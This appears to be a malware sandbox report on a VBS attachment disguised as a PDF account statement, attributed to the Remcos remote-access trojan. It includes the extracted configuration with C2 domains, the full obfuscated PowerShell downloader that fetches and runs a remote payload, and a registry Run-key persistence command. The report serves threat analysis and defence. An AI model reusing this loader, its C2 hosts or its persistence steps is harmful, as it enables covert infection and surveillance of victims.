Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Attached_u...df.vbs

windows7-x64

8

Attached_u...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/12/2024, 06:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Attached_updated_SEPTEMBER_SOA_till_now_total_USD 26162.21_pdf.vbs

  • Size

    52KB

  • MD5

    6502323c58be777bd7cf1046ba20a468

  • SHA1

    51dc97fd8b87b03426c2b74f29a09e00897732d8

  • SHA256

    fb3c178a1787f26fcd75494463b9292bb1c7f76b465c7e78381dce5ed7c8011f

  • SHA512

    bf570c92c5b80a9d94cc1d4cfa2cd4596b8bbaf0e992427448f54cd83bea2e6867f1eac623d0108f241f7de039c1fc07b87d98cef8232ce2366a3fe030c5011c

  • SSDEEP

    384:I5cVCJUYlJPLpoCuPmKOF5OXOlaNyPepflkhiG0gkIENdy3w7u:I5cXYlJPLyCuOKEwtyPenNGO3Ndy3wi

Score
10/10
remcosfreshdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

Fresh

C2

dourtes4hnbouy1.duckdns.org:2487

dourtes4hnbouy1.duckdns.org:2488

dourtes4hnbouy2.duckdns.org:2487

dourtes4hnbouy3.duckdns.org:2487

dourtes4hnbouy4.duckdns.org:2487
Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    kamzourts.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    kamncbiu-LBXP9X

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Attached_updated_SEPTEMBER_SOA_till_now_total_USD 26162.21_pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3344
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Restudied='letfordrveliges';;$Homeotype='Skrupkulredes';;$Squawen='Unfork';;$Atelo101='Raakiddenes';;$Fredeliggjordes=$host.Name;function Uninhaled($Gripper){If ($Fredeliggjordes) {$Vaarbebuderes=5} for ($Damningness=$Vaarbebuderes;;$Damningness+=6){if(!$Gripper[$Damningness]) { break };$Periodicities+=$Gripper[$Damningness];$Damningnessnklinationers='rissle'}$Periodicities}function Foreslaaede($Kortlg){ .($Matindol) ($Kortlg)}$Prunt=Uninhaled 'Insoun CompEjabbet Rigs.G.stiW';$Prunt+=Uninhaled 'S mimEE bolb An aCC fwilEradiiPanioEJustinG usvT';$Modvgtens=Uninhaled 'footsM BoreoAmn sz VictiAfs.vlContelP,alaaAsper/';$Damningnessncommunicability=Uninhaled 'UnrepT.iltel ectosCircu1Crank2';$Fs='Herre[Blomsn ycloEPhenoTHaanl. Drifs T treTenserAutooVThymii hirac StrtEAndedp CryoOBayoni pilcnsolantserioMForesaDe.epn .esoa No dGPycn EStrepROvers]Mercu:Readj:DiencsAmatreripp CPyrotUPromprDu.liIMisauTGalacy Bkk pKursurResu.oPoochTtelefo elicEnsilO .autlBnnes=Faust$EdvardTjenea Be.tM PortnGennei SammNA,cidGDyrtbNToploEDroniSAgentSGimelNSynodcResono,arenmTilremJerntu,regeNSvr,eIvirilCfrafrA jrnBGua aIjernblSiv,iIPasseTKi afy';$Modvgtens+=Uninhaled 'Telef5Frems.Plads0Inhre Trust(G mmiWBas niAmerinGa dedStyrioForhawFricasBolig bekenNSk.llTSmaal Press1Spd a0Udmat.Resur0Vulga;Pa op SouarWAmeliiIrritnOutgr6 Rev,4 Vibr;Splej Bol.x laa6Stili4 ardi;Unove eforrUndervAnkep:Pro o1Giftb3Gunme1lolit.La ds0Bull )Mil,a LivsfG tidee LigacScattkBegreoUnask/ Efte2 An,a0.orfa1brioc0Und,r0baand1Monil0Linta1Modst SubstFSurfei smarrA,tome DuoefNem po kalex Mass/ Sk a1Ripar3 ylph1 Erhv. V nj0';$Tjreklles=Uninhaled 'GrandUtilskSGenopEAlterr Hass- ennea,ealigFor rEKitchNMell T';$Crabbiest2=Uninhaled 'SmidihHorn tReblatSec,npAwlwosM,lti:Circu/ Hubb/CaprisForf hUlt,aaSkrifaTegmiv DidniMorphp Domer utleoAfstdf snope.efensSponssPiratiBrydeoAnskan Bi.la utolKrved. SelvcSliknoniveambyzan/sgernFIndtrl Aitcl ForaeF rbisCurtafK steuOrat n Un rkMinimt SemiiA,mucoHrigenFdek eS bspnNonim. PummpBrdskc.enskz ene>BrisahForbrtNons.t egnpNglevs Frem: Hekt/Ryg t/Traved anseo KommwUpshonEjen tSagkyisne rmSubpueVirtudSondeoAbbrelProtol R ntaDadderLazybs vrme.Ny,tic iarioGoatimNyopr/SurpaF FordlDari l .hereDecu sMethufRoilyuOsmann IsurkUdtoltLnudji Afhao Undin opgiegleitnSnus .Sovsep IncocAflbsz';$Maximize=Uninhaled 'Ruin >';$Matindol=Uninhaled 'VarisI inhaEStemmx';$Liguorian52='Afmagrende';$Arbitration='\Oversigtslisternes.Nut';Foreslaaede (Uninhaled 'In ib$J.gerGNonspL SubroUsi kbBottoa oresLInsti: estR Omo aDispoP SjamgKystsRInne SBreakSMadr,eDeltiTForly1 Ultr3Musik6 Diss=Halsu$Smr le t,atNVesicvthero:Mausoa Sko.p Pre PJ,xieDBefriaGalacT FrocaStier+ Trks$TruttACr,mnrNaturbVagttiLe,ettAffirrPangeAAnvilTGen tISkrpeOSecurn');Foreslaaede (Uninhaled 'Reifi$ conGtilstL,yomeOSnyltbcesarANeovilExper: estas ElimTStiffo Crudf,maagsLi lek GulgiLfterfLot,ntP.rioe CarirRelatNdis.bESiphoSAdspr=Afgif$Udkrscatta rY tria alapbLoudeBGordyIFratrESlagbsUnincTColl 2Banke.HviskS bor P izdL ArkoIGenaaTOverj(Hydat$StoltmGtef A N.nsxMyrmeiTolermVedliiTonalzMontieTildn)');Foreslaaede (Uninhaled $Fs);$Crabbiest2=$Stofskifternes[0];$Upboils=(Uninhaled 'Under$MorergCeritLTriguoGysenB.holeaSvabel Thur:An elCLukreodr.ina .orttDagske HartRStaa s mbar=Gapotn Undee HoppWInstr-CriopOB.sjabDisscjForsteDupliCSols,T Temp AzomesRe ioYEnsuiSTil kT oachEDyrtiMToldb.Fors.$IsbaaPAcronRPressUHejseNViljet');Foreslaaede ($Upboils);Foreslaaede (Uninhaled 'Borep$Ran pcMiscloDsighaRo,gst B,ske RockrAnsp,sM gno.ShrieHafladeC nflaaffeddSpecteHo inrophi sSttys[Wakhi$BinomTMyl.rj Levir Harce DepokGend l .riklCompoeInversZ.gmu] lgev=Femkr$CiselM Tae oHypoidPreimv unmagFlokstLinieeDoctrn Stens');$Statesman=Uninhaled 'Orthe$ Le ec AfstoUndliaK.ngetInsaleStorhr Polysgly o.AlcidDTuricoBobspwTh.isnThymelSequeoUddela,uelldEly rF yreiFrgemloutbeeSubdi(Serph$Dir gCOpgrarTjeneaFornub Skulb.pigriSo.ubeUndissOv.retVidtl2Sus.a,Bedst$oliefJChefguNonapr TrreiLe ses jertppo tprBlseru SanidThuriedike,nafskecvrd,peFlatt)';$Jurisprudence=$Rapgrsset136;Foreslaaede (Uninhaled 'Scrut$AuntsGDesulLDidymoPe leBdaintaUdvejlFrein:LangbRTampeuTukanNShrimDUn ouI tillnOncesg Mon EA.tepRByssa=Sergi(Unwa tPolleeSamansSteu.TSamvi- SvejP CravAackn TUnlichbier Unni$tat rJ,aareU rear lindIo delSLacerp ma,arKjelduPintaDmidwiE AfslnJessecSkifteFilmh)');while (!$Rundinger) {Foreslaaede (Uninhaled ' Scuf$ Gra.gS.jerl Jocaoskjorb IngeaLivsflE yth:Mnj rGF ndarFil ou.hampnHep.tdOpladf NormlAf raa,ithsd IndbeHypoarResu aAkt.rdLightiEp,gruContrsCopaieVanadrH,lda=Fdsle$ RegeH Pulla,andeaStenonFdestdNo pehPje.svOpht eGigmalNonamsfis ueFysi sA.ilicKnei i Cu crWr stkSyvkauBrst.lSy ehrPr,vaeSma,ss') ;Foreslaaede $Statesman;Foreslaaede (Uninhaled 'T lensForvit akfeATebrertitanTUlykk-LusedS raadLV erdEPrioreAandspIrone Darli4');Foreslaaede (Uninhaled 'Trafi$SecreGIbereLKont oAkadeBOverbabe kilTria :SteurrHuttoUKampuNSymfoD Mi.fiInternRetruGInflue VarerBonde=ba be(UnfultPelsnEAftrkSDobbeTEjend- BedwpFelteA LitutReproHthrea Oplgs$Pennyj Som uupaakrAbsoliTheciSSonatpLoft r Fr mUCamoud SkabeLydsinOversCUnavaeReger)') ;Foreslaaede (Uninhaled 'Inds.$ PartGBomulLJesteoFruitbBoligAAntisl Dena:Va,reCAkrotOChlo,NBon oICrea,ORhizotStatsHFa tpyLianarGoddaIFin eUIn,onM Klud=Probl$Und sgS,cchl UkonoOutsiB k,stA Spiflafteg:InterFhorriaSpermCSam,ao yrmenRespeSAngiaTRetraaSaxhoaF rskLForsie ValltSamleS Medi+Nonan+Symm,%Ens,l$Luxemsno asTNazifOKul eFMi moS.phavKhurtiI probfVertetDemile DestRort.onAskrbe SammSStrad.,kattCFlailOHaa duAtominAssimT') ;$Crabbiest2=$Stofskifternes[$Coniothyrium]}$Silendes=310160;$Boligministerkollega=32341;Foreslaaede (Uninhaled 'Res o$ Routg Prool afteOO dinBLufttANonrelTown.:ForsaSKorreEFugeslJukebfGrdssMRatpro g sbV PervE AsthM In seSymasNGkantTJobna Unres= Cura NaturGHj taEOphidtPseud-HotpocSp ldosandhNOu,paTVi itECos on,behfTFacto Aflaa$FagotJSprjtUMyot rWa,taIUnf es BrowPDeterr s.aluEtn.lDCataceha.leNSummaC BranE');Foreslaaede (Uninhaled ' Mono$LearigHollalSynt oReindb .olsaJernflProc : ergaKRepubl T rio OverkC erukP.ehee Nonff MasoaBegyna,usserRemeesDjett Kjell=He er Orchi[ ryptSUdpanyAfmonssplattSu keeS.venmHvide. paraCMa leoF rtsn Hjemv Rec e atror AnistInsul] Bld,:Tredi:,lpinFCotarrEtbrroKle amD,sigBMesonaFlicksForbue,pide6Pyrob4HaderS ,opotA therSmus iIndkon FaargGenes(C nve$Sa miSSvmmeefodsvlPreomfMttermAc enoAthlevDroskeTotalmResoreH,lernhypert,isun)');Foreslaaede (Uninhaled 'Djvle$VanilG AntelSgel OPossiBAdresABeryll Dime:TrafieSuperI LiferDig.b Hypo=Fulde Fj rn[Tast,SDi ilyOversSThortt,astheDamasMS ilo.LabortD scrE Overx TutaTSands.Udvl.ESludpnEpiskcSteamoCardiDU.metiSoapsNPro,mGUtilf]Kosts:Mecat:WhinnAPuttesEnserc TophISkjorIFond..VerniGSgeruEBadentPucafsOrganTSca cr elecIOvercN IndogFooyu(Ep sk$ Vol,kfluteLSmr koMadniK Gradk oyalEFiumaf leta.issaa.elysrU trkSAnkla)');Foreslaaede (Uninhaled ' e to$ PettGMetabl Mac.OEnganbCatecATil alIsole:IdeolSVen imStupaIOp.raTK,emhTStolees,illDLejerESong sDokk,= nflj$OpslieWoldliPostvR ava.TopposRejesUUncucBForgaS MakeTHalvgrContriDecasNTank gPaste( Lunt$Over.s Unc,i rivL afklERek inCar nd Udb eUdganSReind, Aggr$,isprBConseoVapoul .onjI Al igIntramBuddhIAfpron Af.jIBestiS PranT A dre.pororOmvurKA thoOBondeL Wi tL NonfEWagweGShareaFaus.)');Foreslaaede $Smittedes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1732
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Restudied='letfordrveliges';;$Homeotype='Skrupkulredes';;$Squawen='Unfork';;$Atelo101='Raakiddenes';;$Fredeliggjordes=$host.Name;function Uninhaled($Gripper){If ($Fredeliggjordes) {$Vaarbebuderes=5} for ($Damningness=$Vaarbebuderes;;$Damningness+=6){if(!$Gripper[$Damningness]) { break };$Periodicities+=$Gripper[$Damningness];$Damningnessnklinationers='rissle'}$Periodicities}function Foreslaaede($Kortlg){ .($Matindol) ($Kortlg)}$Prunt=Uninhaled 'Insoun CompEjabbet Rigs.G.stiW';$Prunt+=Uninhaled 'S mimEE bolb An aCC fwilEradiiPanioEJustinG usvT';$Modvgtens=Uninhaled 'footsM BoreoAmn sz VictiAfs.vlContelP,alaaAsper/';$Damningnessncommunicability=Uninhaled 'UnrepT.iltel ectosCircu1Crank2';$Fs='Herre[Blomsn ycloEPhenoTHaanl. Drifs T treTenserAutooVThymii hirac StrtEAndedp CryoOBayoni pilcnsolantserioMForesaDe.epn .esoa No dGPycn EStrepROvers]Mercu:Readj:DiencsAmatreripp CPyrotUPromprDu.liIMisauTGalacy Bkk pKursurResu.oPoochTtelefo elicEnsilO .autlBnnes=Faust$EdvardTjenea Be.tM PortnGennei SammNA,cidGDyrtbNToploEDroniSAgentSGimelNSynodcResono,arenmTilremJerntu,regeNSvr,eIvirilCfrafrA jrnBGua aIjernblSiv,iIPasseTKi afy';$Modvgtens+=Uninhaled 'Telef5Frems.Plads0Inhre Trust(G mmiWBas niAmerinGa dedStyrioForhawFricasBolig bekenNSk.llTSmaal Press1Spd a0Udmat.Resur0Vulga;Pa op SouarWAmeliiIrritnOutgr6 Rev,4 Vibr;Splej Bol.x laa6Stili4 ardi;Unove eforrUndervAnkep:Pro o1Giftb3Gunme1lolit.La ds0Bull )Mil,a LivsfG tidee LigacScattkBegreoUnask/ Efte2 An,a0.orfa1brioc0Und,r0baand1Monil0Linta1Modst SubstFSurfei smarrA,tome DuoefNem po kalex Mass/ Sk a1Ripar3 ylph1 Erhv. V nj0';$Tjreklles=Uninhaled 'GrandUtilskSGenopEAlterr Hass- ennea,ealigFor rEKitchNMell T';$Crabbiest2=Uninhaled 'SmidihHorn tReblatSec,npAwlwosM,lti:Circu/ Hubb/CaprisForf hUlt,aaSkrifaTegmiv DidniMorphp Domer utleoAfstdf snope.efensSponssPiratiBrydeoAnskan Bi.la utolKrved. SelvcSliknoniveambyzan/sgernFIndtrl Aitcl ForaeF rbisCurtafK steuOrat n Un rkMinimt SemiiA,mucoHrigenFdek eS bspnNonim. PummpBrdskc.enskz ene>BrisahForbrtNons.t egnpNglevs Frem: Hekt/Ryg t/Traved anseo KommwUpshonEjen tSagkyisne rmSubpueVirtudSondeoAbbrelProtol R ntaDadderLazybs vrme.Ny,tic iarioGoatimNyopr/SurpaF FordlDari l .hereDecu sMethufRoilyuOsmann IsurkUdtoltLnudji Afhao Undin opgiegleitnSnus .Sovsep IncocAflbsz';$Maximize=Uninhaled 'Ruin >';$Matindol=Uninhaled 'VarisI inhaEStemmx';$Liguorian52='Afmagrende';$Arbitration='\Oversigtslisternes.Nut';Foreslaaede (Uninhaled 'In ib$J.gerGNonspL SubroUsi kbBottoa oresLInsti: estR Omo aDispoP SjamgKystsRInne SBreakSMadr,eDeltiTForly1 Ultr3Musik6 Diss=Halsu$Smr le t,atNVesicvthero:Mausoa Sko.p Pre PJ,xieDBefriaGalacT FrocaStier+ Trks$TruttACr,mnrNaturbVagttiLe,ettAffirrPangeAAnvilTGen tISkrpeOSecurn');Foreslaaede (Uninhaled 'Reifi$ conGtilstL,yomeOSnyltbcesarANeovilExper: estas ElimTStiffo Crudf,maagsLi lek GulgiLfterfLot,ntP.rioe CarirRelatNdis.bESiphoSAdspr=Afgif$Udkrscatta rY tria alapbLoudeBGordyIFratrESlagbsUnincTColl 2Banke.HviskS bor P izdL ArkoIGenaaTOverj(Hydat$StoltmGtef A N.nsxMyrmeiTolermVedliiTonalzMontieTildn)');Foreslaaede (Uninhaled $Fs);$Crabbiest2=$Stofskifternes[0];$Upboils=(Uninhaled 'Under$MorergCeritLTriguoGysenB.holeaSvabel Thur:An elCLukreodr.ina .orttDagske HartRStaa s mbar=Gapotn Undee HoppWInstr-CriopOB.sjabDisscjForsteDupliCSols,T Temp AzomesRe ioYEnsuiSTil kT oachEDyrtiMToldb.Fors.$IsbaaPAcronRPressUHejseNViljet');Foreslaaede ($Upboils);Foreslaaede (Uninhaled 'Borep$Ran pcMiscloDsighaRo,gst B,ske RockrAnsp,sM gno.ShrieHafladeC nflaaffeddSpecteHo inrophi sSttys[Wakhi$BinomTMyl.rj Levir Harce DepokGend l .riklCompoeInversZ.gmu] lgev=Femkr$CiselM Tae oHypoidPreimv unmagFlokstLinieeDoctrn Stens');$Statesman=Uninhaled 'Orthe$ Le ec AfstoUndliaK.ngetInsaleStorhr Polysgly o.AlcidDTuricoBobspwTh.isnThymelSequeoUddela,uelldEly rF yreiFrgemloutbeeSubdi(Serph$Dir gCOpgrarTjeneaFornub Skulb.pigriSo.ubeUndissOv.retVidtl2Sus.a,Bedst$oliefJChefguNonapr TrreiLe ses jertppo tprBlseru SanidThuriedike,nafskecvrd,peFlatt)';$Jurisprudence=$Rapgrsset136;Foreslaaede (Uninhaled 'Scrut$AuntsGDesulLDidymoPe leBdaintaUdvejlFrein:LangbRTampeuTukanNShrimDUn ouI tillnOncesg Mon EA.tepRByssa=Sergi(Unwa tPolleeSamansSteu.TSamvi- SvejP CravAackn TUnlichbier Unni$tat rJ,aareU rear lindIo delSLacerp ma,arKjelduPintaDmidwiE AfslnJessecSkifteFilmh)');while (!$Rundinger) {Foreslaaede (Uninhaled ' Scuf$ Gra.gS.jerl Jocaoskjorb IngeaLivsflE yth:Mnj rGF ndarFil ou.hampnHep.tdOpladf NormlAf raa,ithsd IndbeHypoarResu aAkt.rdLightiEp,gruContrsCopaieVanadrH,lda=Fdsle$ RegeH Pulla,andeaStenonFdestdNo pehPje.svOpht eGigmalNonamsfis ueFysi sA.ilicKnei i Cu crWr stkSyvkauBrst.lSy ehrPr,vaeSma,ss') ;Foreslaaede $Statesman;Foreslaaede (Uninhaled 'T lensForvit akfeATebrertitanTUlykk-LusedS raadLV erdEPrioreAandspIrone Darli4');Foreslaaede (Uninhaled 'Trafi$SecreGIbereLKont oAkadeBOverbabe kilTria :SteurrHuttoUKampuNSymfoD Mi.fiInternRetruGInflue VarerBonde=ba be(UnfultPelsnEAftrkSDobbeTEjend- BedwpFelteA LitutReproHthrea Oplgs$Pennyj Som uupaakrAbsoliTheciSSonatpLoft r Fr mUCamoud SkabeLydsinOversCUnavaeReger)') ;Foreslaaede (Uninhaled 'Inds.$ PartGBomulLJesteoFruitbBoligAAntisl Dena:Va,reCAkrotOChlo,NBon oICrea,ORhizotStatsHFa tpyLianarGoddaIFin eUIn,onM Klud=Probl$Und sgS,cchl UkonoOutsiB k,stA Spiflafteg:InterFhorriaSpermCSam,ao yrmenRespeSAngiaTRetraaSaxhoaF rskLForsie ValltSamleS Medi+Nonan+Symm,%Ens,l$Luxemsno asTNazifOKul eFMi moS.phavKhurtiI probfVertetDemile DestRort.onAskrbe SammSStrad.,kattCFlailOHaa duAtominAssimT') ;$Crabbiest2=$Stofskifternes[$Coniothyrium]}$Silendes=310160;$Boligministerkollega=32341;Foreslaaede (Uninhaled 'Res o$ Routg Prool afteOO dinBLufttANonrelTown.:ForsaSKorreEFugeslJukebfGrdssMRatpro g sbV PervE AsthM In seSymasNGkantTJobna Unres= Cura NaturGHj taEOphidtPseud-HotpocSp ldosandhNOu,paTVi itECos on,behfTFacto Aflaa$FagotJSprjtUMyot rWa,taIUnf es BrowPDeterr s.aluEtn.lDCataceha.leNSummaC BranE');Foreslaaede (Uninhaled ' Mono$LearigHollalSynt oReindb .olsaJernflProc : ergaKRepubl T rio OverkC erukP.ehee Nonff MasoaBegyna,usserRemeesDjett Kjell=He er Orchi[ ryptSUdpanyAfmonssplattSu keeS.venmHvide. paraCMa leoF rtsn Hjemv Rec e atror AnistInsul] Bld,:Tredi:,lpinFCotarrEtbrroKle amD,sigBMesonaFlicksForbue,pide6Pyrob4HaderS ,opotA therSmus iIndkon FaargGenes(C nve$Sa miSSvmmeefodsvlPreomfMttermAc enoAthlevDroskeTotalmResoreH,lernhypert,isun)');Foreslaaede (Uninhaled 'Djvle$VanilG AntelSgel OPossiBAdresABeryll Dime:TrafieSuperI LiferDig.b Hypo=Fulde Fj rn[Tast,SDi ilyOversSThortt,astheDamasMS ilo.LabortD scrE Overx TutaTSands.Udvl.ESludpnEpiskcSteamoCardiDU.metiSoapsNPro,mGUtilf]Kosts:Mecat:WhinnAPuttesEnserc TophISkjorIFond..VerniGSgeruEBadentPucafsOrganTSca cr elecIOvercN IndogFooyu(Ep sk$ Vol,kfluteLSmr koMadniK Gradk oyalEFiumaf leta.issaa.elysrU trkSAnkla)');Foreslaaede (Uninhaled ' e to$ PettGMetabl Mac.OEnganbCatecATil alIsole:IdeolSVen imStupaIOp.raTK,emhTStolees,illDLejerESong sDokk,= nflj$OpslieWoldliPostvR ava.TopposRejesUUncucBForgaS MakeTHalvgrContriDecasNTank gPaste( Lunt$Over.s Unc,i rivL afklERek inCar nd Udb eUdganSReind, Aggr$,isprBConseoVapoul .onjI Al igIntramBuddhIAfpron Af.jIBestiS PranT A dre.pororOmvurKA thoOBondeL Wi tL NonfEWagweGShareaFaus.)');Foreslaaede $Smittedes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5012
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4156
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hyperspatial" /t REG_EXPAND_SZ /d "%Antiphlogistian% -windowstyle 1 $Palmitoleic=(gp -Path 'HKCU:\Software\Fedtprocenters\').slgtssagas;%Antiphlogistian% ($Palmitoleic)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3424
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hyperspatial" /t REG_EXPAND_SZ /d "%Antiphlogistian% -windowstyle 1 $Palmitoleic=(gp -Path 'HKCU:\Software\Fedtprocenters\').slgtssagas;%Antiphlogistian% ($Palmitoleic)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:392

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    71444def27770d9071039d005d0323b7

    SHA1

    cef8654e95495786ac9347494f4417819373427e

    SHA256

    8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

    SHA512

    a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dcsba1q4.amy.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Oversigtslisternes.Nut
    Filesize

    445KB

    MD5

    abcbb25c003afd9afc598e5628e22953

    SHA1

    d8a2b04050264aaab4491dc2c5125c23609d1533

    SHA256

    47b59e11d1bbaf43c7d8b5f52846709c034025e9bdeb98a126dc49579813f4cf

    SHA512

    f683bf82869ae29b2f9c11ee6030426aca36699f4e1bf0e936bef64e30517da4030d5cb6ee75c623ea6d4fbf441913a69e680c58e30f94e3e15dd7901d9e1a4b

    Download Submit

  • memory/1732-18-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1732-16-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1732-17-0x00007FFD35BC3000-0x00007FFD35BC5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1732-15-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1732-21-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1732-24-0x00007FFD35BC0000-0x00007FFD36681000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1732-14-0x0000027D7B000000-0x0000027D7B022000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1732-4-0x00007FFD35BC3000-0x00007FFD35BC5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4156-64-0x0000000000800000-0x0000000001A54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4156-50-0x0000000000800000-0x0000000001A54000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/5012-28-0x0000000005D40000-0x0000000005DA6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/5012-45-0x00000000077A0000-0x0000000007836000-memory.dmp

    Filesize

    600KB

    Download

  • memory/5012-29-0x0000000005DB0000-0x0000000005E16000-memory.dmp

    Filesize

    408KB

    Download

  • memory/5012-41-0x00000000064F0000-0x000000000650E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/5012-42-0x0000000006520000-0x000000000656C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/5012-43-0x0000000007D30000-0x00000000083AA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/5012-44-0x0000000006AA0000-0x0000000006ABA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/5012-39-0x0000000005EA0000-0x00000000061F4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/5012-46-0x0000000007700000-0x0000000007722000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5012-47-0x0000000008960000-0x0000000008F04000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/5012-27-0x0000000005500000-0x0000000005522000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5012-49-0x0000000008F10000-0x000000000D67C000-memory.dmp

    Filesize

    71.4MB

    Download

  • memory/5012-26-0x00000000055A0000-0x0000000005BC8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/5012-25-0x0000000004F30000-0x0000000004F66000-memory.dmp

    Filesize

    216KB

    Download